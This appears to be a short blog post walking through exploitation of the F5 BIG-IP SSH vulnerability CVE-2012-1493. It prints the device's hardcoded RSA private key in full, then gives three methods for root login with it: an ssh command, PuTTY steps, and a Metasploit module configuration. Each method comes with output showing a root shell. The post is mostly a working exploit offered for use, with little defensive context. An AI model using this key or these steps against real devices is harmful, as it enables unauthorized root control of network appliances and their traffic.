# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

No comments: